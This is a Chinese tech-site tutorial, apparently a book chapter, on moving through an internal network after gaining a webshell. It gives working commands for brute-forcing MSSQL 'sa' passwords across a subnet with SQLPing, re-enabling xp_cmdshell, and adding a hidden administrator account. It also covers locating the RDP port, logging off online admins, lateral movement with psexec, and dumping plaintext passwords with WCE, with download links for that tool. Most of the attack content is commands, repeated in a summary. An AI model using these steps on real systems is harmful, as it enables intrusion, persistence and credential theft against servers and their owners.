网站首页 > 技术教程 正文
在实际渗透过程中,往往通过SQL注入或者弱口令登录后台,成功获取了Webshell,但对于如何进行内网渗透相当纠结,其实在获取入口权限的情况下,通过lcx端口转发等工具,进入内网,可以通过数据库、系统账号等口令扫描来实施内网渗透。本文就介绍如何在内网中进行MSSQL口令扫描及获取服务器权限。
11.1.1使用SQLPing扫描获取mssql口令
在SQLPing程序目录,配置好passlist.txt和userlist.txt文件,如图1所示,设置扫描的IP地址及其范围,本案例是针对内网开始地址192.100.100.1,终止地址为192.100.100.254。在实际渗透测试中根据实际需要来设置扫描的IP地址,User list也是根据实际掌握情况来设置,比较常用的用户为sa。Password list根据实际收集的密码来进行扫描,如果是普通密码破解,则可以使用top 10000password这种字典,在内网中可以逐渐加强该字典,将收集到的所有用户密码全部加入。
11.1.2扫描并破解密码
如图2所示,对192.100.100.X的C段地址进行扫描,成功发现16个MSSQL实例,且暴力破解成功5个账号,红色字体表示破解成功。单击“File”菜单,可以将扫描结果保存为xml文件,然后打开文件进行查看,如图3所示。
11.1.3使用SQLTOOLS进行提权
(1)连接测试
在SQL连接设置中分别填入IP地址“192.100.100.33”,密码“lo*******”,如图4所示,单击连接,如果密码正确则会提示连接成功,然后执行”dir c:\”命令来测试是否可以执行DOS命令。
(2)查看数据库版本
在SQL命令中执行“select @@version”命令,如图5所示,获取当前数据库为SQL Server 2005.
(3)恢复xp_cmdshell存储过程
在SQL Tools中分别执行以下语句来恢复xp_cmdshell存储过程,执行效果如图6所示。
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
(4)获取当前权限
在DOS命令中执行“whoami”命令获取当前用户权限为系统权限(nt authority\system),如图7所示。
(5)添加管理员用户到管理组
在DOS命令中分别执行以下语句
net user siweb$ siweb /add
net localgroup administrators siweb$ /add
net localgroup administrators
来添加用户siweb$密码为siweb,并将siweb$用户添加到管理员组,最后查看管理员组用户siweb$是否添加成功,如图8,图9,图10所示。
(6)获取远程终端端口
远程终端默认端口是3389,有些情况下,无法直接端口进行扫描,则可以通过命令行来快速获取:
tasklist /svc | find " Term " 或者tasklist /svc | find " TermService "
显示结果如图11所示,其中7100表示进程号,TermService表示远程终端服务。
netstat -ano | find "7100"则表示获取进程号为7100的端口号,如图12所示。
(7)查看当前远程终端用户登录情况
如图13所示,可以使用query user /quser等命令来查看当前3389连接情况,防止发生管理员在线情况下登入服务器!使用logoff ID注销当前登录的用户。例如注销管理员显示为唱片的用户,则可以使用“logoff 1”命令。
(8)使用psexec配合wce来获取密码
执行net use \\192.100.100.33\admin$ “siweb” /user:siweb$
Psexec \\192.100.100.33 cmd
如图14所示,成功进行交互式命令提示符。
(9)获取当前系统架构
执行systeminfo | find "86"获取信息中会显示Family等字样,如图15所示,则表明该操作系统是X86系统,否则使用systeminfo | find "64"命令来获取该架构为X64架构,然后使用对应的wce等密码获取程序来获取明文或者加密的哈希值。
11.1.4登录远程终端
使用获取的密码Administrator/!XML********登录192.100.100.33服务器,如图16所示成功获取内网中一台服务器权限。
11.1.5总结与提高
(1)口令扫描,可以通过sqlping等工具对内网IP进行扫描,获取sa口令
(2)查看服务器版本,对SQL Server 2005可恢复其存储进程:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
(3)对SQL Server 2000/2005可以查看其当前用户权限,执行whomai,如果是管理员权限,则可以通过添加用户来获取服务器权限。
net user siweb$ siweb /add
net localgroup administrators siweb$ /add
net localgroup administrators
(4)精确获取远程终端端口命令:
tasklist /svc | find "Term"
svchost.exe 7100 TermService
netstat -ano | find "7100"
(5)获取操作系统架构,便于使用合适的密码获取软件获取明文密码
systeminfo | find "86"
systeminfo | find "64"
(6)明文密码获取
Wce -w
密码hash快速破解:http://www.objectif-securite.ch/en/ophcrack.php
Wce下载地址:
http://www.ampliasecurity.com/research/wce_v1_4beta_x32.zip
http://www.ampliasecurity.com/research/wce_v1_4beta_x64.zip
http://www.ampliasecurity.com/research/wce_v1_4beta_universal.zip
- 上一篇: 汽车称重软件系统配置(一)
- 下一篇: 用友畅捷通T3软件 新建账套提示“将要建立的年度数据库已存在
猜你喜欢
- 2024-11-23 达梦数据库DM8的笔记及数据迁移
- 2024-11-23 ADO.NET的作用
- 2024-11-23 Navicat 15 for SQL Server 安装教程(附安装包下载)
- 2024-11-23 车牌识别系统数据库安装教程
- 2024-11-23 北京智能考勤管理系统需求描述
- 2024-11-23 SQL Server数据库每天自动备份设置
- 2024-11-23 用友畅捷通T3软件 新建账套提示“将要建立的年度数据库已存在
- 2024-11-23 汽车称重软件系统配置(一)
- 2024-11-23 SQL SERVER2016数据库安装
- 2024-11-23 什么是ETL?算了,你可能不懂
你 发表评论:
欢迎- 01-09单因素方差分析+作图
- 01-09描述性统计分析 之 均值分析
- 01-0986:重复性和再现性分析GRR(2)-GRR均值极差分析法和方差分析法
- 01-09SPC如何做方差分析,意义又在哪里?
- 01-09MedSPSS小课堂——多因素方差分析
- 01-09MedSPSS小课堂——双因素方差分析
- 01-09SPSS单因素方差分析的操作步骤及结果解读,陈老师SPSS数据分析
- 01-0914单因素方差分析:One-Way ANOVA
- 最近发表
- 标签列表
-
- sd分区 (65)
- raid5数据恢复 (81)
- 地址转换 (73)
- 手机存储卡根目录 (55)
- tcp端口 (74)
- project server (59)
- 双击ctrl (55)
- 鼠标 单击变双击 (67)
- debugview (59)
- 字符动画 (65)
- flushdns (57)
- ps复制快捷键 (57)
- 清除系统垃圾代码 (58)
- web服务器的架设 (67)
- 16进制转换 (69)
- xclient (55)
- ps源文件 (67)
- filezilla server (59)
- 句柄无效 (56)
- word页眉页脚设置 (59)
- ansys实例 (56)
- 6 1 3固件 (59)
- sqlserver2000挂起 (59)
- vm虚拟主机 (55)
- config (61)
本文暂时没有评论,来添加一个吧(●'◡'●)